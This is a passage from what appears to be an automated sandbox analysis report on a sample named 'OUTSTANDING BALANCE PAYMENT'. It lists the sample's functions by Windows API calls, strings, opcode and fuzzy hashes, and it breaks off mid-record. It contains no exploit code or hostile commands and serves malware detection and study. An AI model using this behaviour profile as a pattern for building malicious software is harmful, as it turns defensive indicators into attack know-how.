                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 35144d7a6885523f0a3ef75b28bb22ba0f4a3a6ba1af96dd703b187d2b430d25
                                                          • Instruction ID: da9cf3cc203451c8efdfe07105997886df2ce3600cf29046a3797f3016197244
                                                          • Opcode Fuzzy Hash: 35144d7a6885523f0a3ef75b28bb22ba0f4a3a6ba1af96dd703b187d2b430d25
                                                          • Instruction Fuzzy Hash: AF616B75900248AFEB20DFA4CC85FEE77F8EB09714F1441A9FA05E72A1D770A946DB50
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00B994FE
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00B99549
                                                          • VariantInit.OLEAUT32(?), ref: 00B9955B
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B9957B
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00B995BE
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B995D2
                                                          • VariantClear.OLEAUT32(?), ref: 00B995E7
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00B995F4
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B995FD
                                                          • VariantClear.OLEAUT32(?), ref: 00B9960F
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B9961A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: 441044d758ba8a86697b089120964ee3d5d0f3c47918a88a05e98727c8833660
                                                          • Instruction ID: c1414c7a5875d652621a87e8bd402ae926aec40efeca81559dcf92428f476bc1
                                                          • Opcode Fuzzy Hash: 441044d758ba8a86697b089120964ee3d5d0f3c47918a88a05e98727c8833660
                                                          • Instruction Fuzzy Hash: 41412E31900219AFCF01EFA8D8849DEBBB9FF18354F0180A9E515E7261DB71EA45CBA1
                                                          APIs
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                          • CoInitialize.OLE32 ref: 00BBADF6
                                                          • CoUninitialize.OLE32 ref: 00BBAE01
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00BED8FC,?), ref: 00BBAE61
                                                          • IIDFromString.OLE32(?,?), ref: 00BBAED4
                                                          • VariantInit.OLEAUT32(?), ref: 00BBAF6E
                                                          • VariantClear.OLEAUT32(?), ref: 00BBAFCF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: 24fb47895f0bb949b632a19ac763362ec17d22f76663d5c545045d84a78f3d2b
                                                          • Instruction ID: 5e08d3d0fcd0d6be4c02d00ff5b60c27b3de3712cde156d5e6f5c0dea686b1c2
                                                          • Opcode Fuzzy Hash: 24fb47895f0bb949b632a19ac763362ec17d22f76663d5c545045d84a78f3d2b
                                                          • Instruction Fuzzy Hash: F0617971A08301AFD710DF54C888BBABBE8EF49714F144899F9859B291C7B0ED44CB93
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00BB8168
                                                          • inet_addr.WSOCK32(?,?,?), ref: 00BB81AD
                                                          • gethostbyname.WSOCK32(?), ref: 00BB81B9
                                                          • IcmpCreateFile.IPHLPAPI ref: 00BB81C7
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB8237
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB824D
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BB82C2
                                                          • WSACleanup.WSOCK32 ref: 00BB82C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: 7ca154ec1aee2449831dd59397e2c17fdf1f29bf61e7beaf292508a7f1c1af66
                                                          • Instruction ID: 9409a8ecd7af8e79219c975bf6bf295034cc236f2921da5c9c2adfb749335f4c
                                                          • Opcode Fuzzy Hash: 7ca154ec1aee2449831dd59397e2c17fdf1f29bf61e7beaf292508a7f1c1af66
                                                          • Instruction Fuzzy Hash: 555181316046009FD7119F64DC85BBABBE9EF48310F0489A9F959EB2A1DFB4ED05CB42
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00BAE396
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BAE40C
                                                          • GetLastError.KERNEL32 ref: 00BAE416
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00BAE483
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: ec66c2ded2795397447dbd827f060533a8d7c1a7a22ffbec003e2b719023fbad
                                                          • Instruction ID: c672eb9f4b68c3134f948b56dddcecbcc72db30c4ca1d4c6eff5db2fecb38213
                                                          • Opcode Fuzzy Hash: ec66c2ded2795397447dbd827f060533a8d7c1a7a22ffbec003e2b719023fbad
                                                          • Instruction Fuzzy Hash: 1F319035A042099FDB01EB68C895ABDBBF8EF0A304F1480A5E515EB391DF70DA42CB91
                                                          APIs
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B9B98C
                                                          • GetDlgCtrlID.USER32 ref: 00B9B997
                                                          • GetParent.USER32 ref: 00B9B9B3
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B9B9B6
                                                          • GetDlgCtrlID.USER32(?), ref: 00B9B9BF
                                                          • GetParent.USER32(?), ref: 00B9B9DB
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B9B9DE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1383977212-1403004172
                                                          • Opcode ID: 3cf4da28855e5e5284e3401991cb8163d3c18b59f01e9207097eec3425a51a3a
                                                          • Instruction ID: 4b06960757b263eb3848ec3e01318a63e289696fa3a551a4191f6c0b93d7f4e3
                                                          • Opcode Fuzzy Hash: 3cf4da28855e5e5284e3401991cb8163d3c18b59f01e9207097eec3425a51a3a
                                                          • Instruction Fuzzy Hash: 5921A174900108AFDF04ABA4DCC6EFEBBB5EF4A300B100169F661972A1DBB958159B20
                                                          APIs
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B9BA73
                                                          • GetDlgCtrlID.USER32 ref: 00B9BA7E
                                                          • GetParent.USER32 ref: 00B9BA9A
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B9BA9D
                                                          • GetDlgCtrlID.USER32(?), ref: 00B9BAA6
                                                          • GetParent.USER32(?), ref: 00B9BAC2
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B9BAC5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1383977212-1403004172
                                                          • Opcode ID: a5b949477ec4608496cafd2344c9decef21d04093bc5a0f6b43169e6488ee80e
                                                          • Instruction ID: 60356d6990210c55b4d46d841674e7393cd4f1a8e24c03e036ba2c55ff3f332c
                                                          • Opcode Fuzzy Hash: a5b949477ec4608496cafd2344c9decef21d04093bc5a0f6b43169e6488ee80e
                                                          • Instruction Fuzzy Hash: CA21C2B4A00108BFDF00ABA4DC85EFEBBB9EF45300F100165F551A71A1DFB95919AB20
                                                          APIs
                                                          • GetParent.USER32 ref: 00B9BAE3
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00B9BAF8
                                                          • _wcscmp.LIBCMT ref: 00B9BB0A
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B9BB85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: baba95a35e88e07f8f57bd24f078e00a596a33346160e4a9756cf8060fec7694
                                                          • Instruction ID: ea335c710df48db851db3d1af2431e93b4d67f3006b1e104a69f2c3e545d0866
                                                          • Opcode Fuzzy Hash: baba95a35e88e07f8f57bd24f078e00a596a33346160e4a9756cf8060fec7694
                                                          • Instruction Fuzzy Hash: 1511067A648307FEFE247624FC46DE637DCDF12764B2000B2FA04E50E5EFA16861A614
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00BBB2D5
                                                          • CoInitialize.OLE32(00000000), ref: 00BBB302
                                                          • CoUninitialize.OLE32 ref: 00BBB30C
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00BBB40C
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BBB539
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00BBB56D
                                                          • CoGetObject.OLE32(?,00000000,00BED91C,?), ref: 00BBB590
                                                          • SetErrorMode.KERNEL32(00000000), ref: 00BBB5A3
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BBB623
                                                          • VariantClear.OLEAUT32(00BED91C), ref: 00BBB633
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID:
                                                          • API String ID: 2395222682-0
                                                          • Opcode ID: c8fb0c038d02fc3fbdefa1207eda76e763cabc180b418966deafbd3857905cd4
                                                          • Instruction ID: 71f194046182b23f972a40f5bbcfa1a8c1973ba05817782a218786608d78b1c2
                                                          • Opcode Fuzzy Hash: c8fb0c038d02fc3fbdefa1207eda76e763cabc180b418966deafbd3857905cd4
                                                          • Instruction Fuzzy Hash: 0FC10371608345AFCB00DF69C894D6AB7E9FF88304F0449ADF58A9B251DBB1ED05CB52
                                                          APIs
                                                          • __lock.LIBCMT ref: 00B8ACC1
                                                            • Part of subcall function 00B87CF4: __mtinitlocknum.LIBCMT ref: 00B87D06
                                                            • Part of subcall function 00B87CF4: EnterCriticalSection.KERNEL32(00000000,?,00B87ADD,0000000D), ref: 00B87D1F
                                                          • __calloc_crt.LIBCMT ref: 00B8ACD2
                                                            • Part of subcall function 00B86986: __calloc_impl.LIBCMT ref: 00B86995
                                                            • Part of subcall function 00B86986: Sleep.KERNEL32(00000000,000003BC,00B7F507,?,0000000E), ref: 00B869AC
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B8ACED
                                                          • GetStartupInfoW.KERNEL32(?,00C16E28,00000064,00B85E91,00C16C70,00000014), ref: 00B8AD46
                                                          • __calloc_crt.LIBCMT ref: 00B8AD91
                                                          • GetFileType.KERNEL32(00000001), ref: 00B8ADD8
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00B8AE11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                          • String ID:
                                                          • API String ID: 1426640281-0
                                                          • Opcode ID: 947c15b384eeba8abc4d450fd6536dc83262316c9f8a4805585dc8dd86933191
                                                          • Instruction ID: 956f39d34b7ac8f77adfd89c0e4bff57325fd2eb41f0c24bfcc48e51158f1796
                                                          • Opcode Fuzzy Hash: 947c15b384eeba8abc4d450fd6536dc83262316c9f8a4805585dc8dd86933191
                                                          • Instruction Fuzzy Hash: 9481D8719053458FEB24EF68C8806ADBBF0EF05325B2446AED4A6EB3E1D7349843CB55
                                                          APIs
                                                          • __swprintf.LIBCMT ref: 00BA67FD
                                                          • __swprintf.LIBCMT ref: 00BA680A
                                                            • Part of subcall function 00B8172B: __woutput_l.LIBCMT ref: 00B81784
                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00BA6834
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00BA6840
                                                          • LockResource.KERNEL32(00000000), ref: 00BA684D
                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00BA686D
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00BA687F
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00BA688E
                                                          • LockResource.KERNEL32(?), ref: 00BA689A
                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00BA68F9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                          • String ID:
                                                          • API String ID: 1433390588-0
                                                          • Opcode ID: 618c92c99f399727ed2437007936003796be4eb06f3adf97f85e38cbbd7e4596
                                                          • Instruction ID: 750776ce02e07330876014457a6c867c79b566c5a5af92f016449575d88e1da5
                                                          • Opcode Fuzzy Hash: 618c92c99f399727ed2437007936003796be4eb06f3adf97f85e38cbbd7e4596
                                                          • Instruction Fuzzy Hash: 88318EB190425AABDB109F60DD85ABF7BECEF09340B088466FA12D7150EB78D911DB70
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00BA4047
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA405B
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00BA4062
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA4071
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA4083
                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA409C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA40AE
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA40F3
                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA4108
                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA4113
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: 16523ffd120eb2a7f100a08aff9f8323db165b451d33275b71ed5f5d35fc6743
                                                          • Instruction ID: 6917f22bd8d7b9cd7fad174aec57463ac933d0768d0380049c0c3797183e36d5
                                                          • Opcode Fuzzy Hash: 16523ffd120eb2a7f100a08aff9f8323db165b451d33275b71ed5f5d35fc6743
                                                          • Instruction Fuzzy Hash: 0931C171514244AFDB21DF58DC86B6D7BE9FBA2311F10824AF904EB290CBF99D818B60
                                                          APIs
                                                          • EnumChildWindows.USER32(?,00B9CF50), ref: 00B9CE90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: 508be323b01103b898378b1b6b833151da68f503f893b42ee7e27387d5110587
                                                          • Instruction ID: 3cf822f9364c4341a0932c53f3c7a3080c09c74ffaa96265192ee279f7227d57
                                                          • Opcode Fuzzy Hash: 508be323b01103b898378b1b6b833151da68f503f893b42ee7e27387d5110587
                                                          • Instruction Fuzzy Hash: ED915E74A04506ABCF18DF64C481BEAFFF9FF05300F5085A9E45AA7151DF30A99ADBA0
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B630DC
                                                          • CoUninitialize.OLE32(?,00000000), ref: 00B63181
                                                          • UnregisterHotKey.USER32(?), ref: 00B632A9
                                                          • DestroyWindow.USER32(?), ref: 00BD5079
                                                          • FreeLibrary.KERNEL32(?), ref: 00BD50F8
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BD5125
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: 3e61a99f41eb71935d1dcf9cc9dfbb7a30b4faab8aaaaa836c1837b1e30b3ebf
                                                          • Instruction ID: 428b0bf0a34f06e3462539aadd58456fa6518cee5d0a80cc888a94c9d9e9d8d9
                                                          • Opcode Fuzzy Hash: 3e61a99f41eb71935d1dcf9cc9dfbb7a30b4faab8aaaaa836c1837b1e30b3ebf
                                                          • Instruction Fuzzy Hash: 0F91F6746002468FC715EF24C895A68F3E4FF15704F5482E9E50AAB2A2DF38AE5ACF54
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00B7CC15
                                                            • Part of subcall function 00B7CCCD: GetClientRect.USER32(?,?), ref: 00B7CCF6
                                                            • Part of subcall function 00B7CCCD: GetWindowRect.USER32(?,?), ref: 00B7CD37
                                                            • Part of subcall function 00B7CCCD: ScreenToClient.USER32(?,?), ref: 00B7CD5F
                                                          • GetDC.USER32 ref: 00BDD137
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BDD14A
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00BDD158
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00BDD16D
                                                          • ReleaseDC.USER32(?,00000000), ref: 00BDD175
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BDD200
                                                          Strings
                                                          Memory Dump Source
